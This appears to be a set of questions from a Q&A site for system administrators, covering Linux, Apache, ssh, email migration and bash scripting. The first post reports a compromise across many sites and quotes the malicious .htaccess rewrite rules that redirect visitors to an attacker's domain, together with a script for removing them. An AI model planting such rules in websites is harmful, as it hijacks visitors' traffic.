Brent's questions

We operate a webserver farm hosting around 300 websites.

Yesterday morning a script placed .htaccess files owned by www-data (the apache user) in every directory under the document_root of most (but not all) sites.

The content of the .htaccess file was this:

RewriteEngine On
RewriteCond %{HTTP_REFERER} ^http://
RewriteCond %{HTTP_REFERER} !%{HTTP_HOST}
RewriteRule . http://84f6a4eef61784b33e4acbd32c8fdd72.com/%{REMOTE_ADDR}

Googling for that url (which is the md5 hash of "antivirus") I discovered that this same thing happened all over the internet, and am looking for somebody who has already dealt with this, and determined where the vulnerability is.

I have searched most of our logs, but haven't found anything conclusive yet. Are there others who experienced the same thing that have gotten further than I have in pinpointing the hole?

So far we have determined:

• the changes were made as www-data, so apache or it's plugins are likely the culprit
• all the changes were made within 15 minutes of each other, so it was probably automated
• since our websites have widely varying domain names, I think a single vulnerability on one site was responsible (rather than a common vulnerability on every site)
• if an .htaccess file already existed and was writeable by www-data, then the script was kind, and simply appended the above lines to the end of the file (making it easy to reverse)

Any more hints would be appreciated.

==Edit==

For those who need it, here is the script I used to clean up the .htaccess files:

#!/bin/bash
PATT=84f6a4eef61784b33e4acbd32c8fdd72.com
DIR=/mnt
TMP=/tmp/`mktemp "XXXXXX"`
find $DIR -name .htaccess|while read FILE; do
  if ( grep $PATT "$FILE" > /dev/null); then
    if [ `cat "$FILE"|wc -l` -eq 4 ]; then
      rm "$FILE"
    else
      if ( tail -n1 "$FILE"|grep $PATT > /dev/null ); then
        rm $TMP
        cp "$FILE" $TMP
        LINES=`cat $TMP|wc -l`
        GOODLINES=$(($LINES-4))
        head -n $GOODLINES $TMP > "$FILE"
      else
        echo $FILE requires manual intervention
      fi
    fi
  fi
done

I have several servers running Debian Lenny.

Just recently I discovered the PermitRootLogin=forced-commands-only directive for ssh, which allows me to run a scripted rsync as root with an ssl key, without enabling more generalized root ssh access.

However, last week this stopped working - it appears on all of my servers - and I can't figure out why.

Everything continues to work fine with PermitRootLogin=yes, but I would prefer to block root logins - especially via passwords.

The day it stopped working, we reconfigured some of the ports on one of our switches (which we later reverted), but I can't see that affecting this, since it still works with PermitRootLogin set to yes.

How can I diagnose why the forced-commands-only directive has apparently stopped working?

We are a medium-large non-profit company, with around 1000 staff and volunteers, and have been using MS Exchange (currently 2003) for our mail system for years.

I recently attended a Google conference where they were positing that "Cloud computing is the way of the future", and encouraging us to switch from doing our own email with Exchange, to using GMail and Google Apps for everything.

Additionally, one of our departments has been pushing from inside to do this transition within their own department, if not throughout the entire organization.

I can definitely see some benefits - such as:

1. Archive space - we never seem to have the space our users want, and of course, the more we get, the more we have to back up
2. OS Agnostic - Exchange is definitely built for windows, and with mac and linux users on the rise, these users increasingly demand better tools / support. Google offers this.
3. Better archiving - potential of e-discovery, that doesn't exist in a practical way with our current setup.
4. Switching would relieve us of a fair bit of server administration, give more options to our end users, and free up the server resources we are now using for Exchange.
5. Our IT department wants to be perceived as providing up-to-date solutions to technical problems, and this change would definitely provide such an image.
6. Google's infrastructure is obviously much more robust than ours, and they employ some of the world's best security and network experts.

However, there are also some serious drawbacks:

1. We would be essentially outsourcing one of our mission-critical systems to a 3rd party
2. The switch would inevitably involve Google Apps and perhaps more as well. That means we would have a-lot more at the mercy of a single (potentially weak) password. (is there a way to make this more secure using a password plus physical key of some sort??)
3. Our data would not remain under our roof - or even in our country (Canada). This obviously has plusses on the Disaster Recovery side, but I think there are potential negatives on the legal side.
4. I can't imagine that somebody as large as Google would be as responsive as we would want with regard to non-critical issues such as tracing missing emails, etc. (not sure how much access we would have to basic mail logs - for instance)

Can anyone help me evaluate this decision?

• What issues am I overlooking?
• What experiences have you had with this transition (or the opposite - gmail to Exchange)
• Can you add to the points I have already outlined?

I have an apache webserver running many VirtualHosts.

Recently it has been bogging down and becoming unresponsive, and I'm wondering how I can determine which VirtualHosts are causing most of the issue. We have had occasions in the past where a bug in the code of an individual site has taken down the whole server. My goal is to be able to diagnose these instances quickly.

I am monitoring the server with munin and notice that the number of apache processes, memory usage, and load tend to be very high during the periods in question. Problem is, these statistics are for the whole webserver, not for individual VirtualHosts.

I have written a script to parse the weblogs for traffic per VirtualHost, but it is appearing that that is not enough. I probably need to determine how many apache processes each VirtualHost is responsible for, or how long they hold each process open - or perhaps how much memory usage each is responsible for.

Where can I find this information? I don't mind writing a script to track this data, but I don't know exactly where to extract it from in the first place.

I have a directory with a couple hundred thousand files in it.

I want to delete all the files, but rm * -f reports: "argument list too long"

What is the best way to clear out this directory?

I have a LAMP server serving a number of different websites using NameVirtualHosts.

Until recently having a global php.ini file has been just fine, but recently one of our developers has requested some settings in php.ini that I'd rather not set globally.

I'm pretty sure I've heard that you can set up php.ini files on a per-site basis, but don't know how to go about doing this.

Can somebody point me in the right direction as to how to accomplish this?

I have a script that updates me on any changes to the kernel log on my (Debian) servers.

The problem is that occasionally the log contains lines like:

last message repeated 4 times

I realize that this is a feature to shorten the size of the logs - but would prefer in this case that every instance of the message be logged instead.

Is there a way to turn off this feature?

I am setting up a linux server that I want to send mail independently of our main mailserver (ie. directly). The problem is, when I send mail to an external address, it bounces with the message domain of sender address does not exist. (it is sending the mail as [email protected])

What is the proper way to change the domain of my email sender?

I noticed that several people have recommended using etckeeper to apply version control to my /etc directory.

It appears to me that the default install puts a repository on the same machine as the /etc you are trying to manage. This works fine for version control, but doesn't give the added benefit of making an off-server backup of the files - or allow me to duplicate portions of /etc from one source machine to another.

Is it possible to share a single git repository on a central admin machine, so that etckeeper on each server stores its data in the same place?

(I am doing a similar thing now with svn and some custom scripts to commit and revert files, but I have to remember to commit them when I make changes.)

I have an ubuntu slice at slicehost, which means it is a DomU on a Xen host - and it's a pretty stripped down installation.

The thing that bugs me is that scrolling back in the terminal using shift-pgup doesn't work.

Can anybody tell me what package enables this scrollback functionality (so I can check if it is installed) - or if you have any other insights into why it might not be working, let me know.

(note: I am currently running screen with "defscrollback 1024" set, but it still doesn't work)

What are the best-practices for using Active Directory to authenticate users on linux (Debian) boxes?

The way I would like it to work would be to add AD users to a group - say linux administrators or linux webserver, and based on their group membership they would/would not be granted access to a particular server. Ideally the root account would be the only one maintained in the standard way.

My goals in doing this are as follows:

• To allow password changes in one place
• To automatically grant certain people access to the linux servers using their AD credentials
• To consolodate all of our user information into one database

Things I want to avoid are:

• anything difficult/counter-intuitive for our Active Directory administrator to manage
• locking users out if the AD servers are unreachable for some reason (ie - it needs to cache the credentials somehow)
• anything too complex or non-standard that will break the next time I upgrade the server.

We have a tone generator kit for tracing network cables, but I am having trouble using it correctly.

The tone generator end plugs into the network cable I am trying to trace, and then I assume I should be able to go into the server room and just swipe the probe across the ends of the patch cables while still plugged into the switch, and hear the tone, but that doesn't seem to work.

• When the probe is pointed directly at the tone generator, it responds correctly.
• When I point it a few inches down the wire that is connected to it, it does not respond. I suspect this is due to the cable shielding? As a result, I assume I need to point at the cable end, and not the middle of the wire in the server room.
• My understanding is that the probe does not require you to un-plug any cables to work. Is this correct?

It would be great if someone who knows what they are doing would document the correct procedure here.

Thanks.

I have heard it suggested that we set up a special email address, with it's only purpose being to be harvested. Then blacklisting every sender that targets this address.

I'm wondering:

• if anyone else has tried this
• how do you go about doing it (ie - put the address in a hidden field on your website - or better ways?)
• does it work?
• Is there anything to watch out for when trying this (ie. legitimate senders using harvested addresses?)

I understand that the SysRq key can be used to execute low-level system commands on a crashed linux server.

Can someone explain how to use this feature, whether it works remotely over ssh or a vmware console window, and anything else it can be used for (besides rebooting a crashed system)?

I'm trying to find a computer that has a certain IP address on our internal network. I have identified the computer name from DNS, but in this case it does not help me.

Just wondering if I can somehow tie the IP to a switch port, and track it from there? If so, how?

What is the best way to determine if a variable in bash is empty ("")?

I have heard that it is recommended that I do if [ "x$variable" = "x" ]

Is that the correct way? (there must be something more straightforward)

I am writing a bash script to analyze the mail logs on our network, which is mostly postfix boxes, but would like to include MS Exchange logs in the analysis if possible.

Is there any way to copy a file off of a windows machine remotely from the command line in linux? (note: I have admin priv's on the windows box)

I need to write a bash script, and would like it to parse unordered parameters of the format:

scriptname --param1 <string> --param2 <string> --param3 <date>

Is there a simple way to accomplish this, or am I pretty much stuck with $1, $2, $3?

edit

(note - I don't need long parameter names - single letters would be fine too)

What is the best tool to monitor/analyze network traffic on an entire network (several subnets)?

I'm looking for something that will help me toubleshoot bandwidth problems when, for instance, users start complaining that the "network is slow"

Is there a simple way for me to force another user off of a linux box, while I am logged in as root? I understand that I could determine what type of session they have open, and kill the pid - but I'm thinking there must be a command to do this that I don't know about.

Any ideas?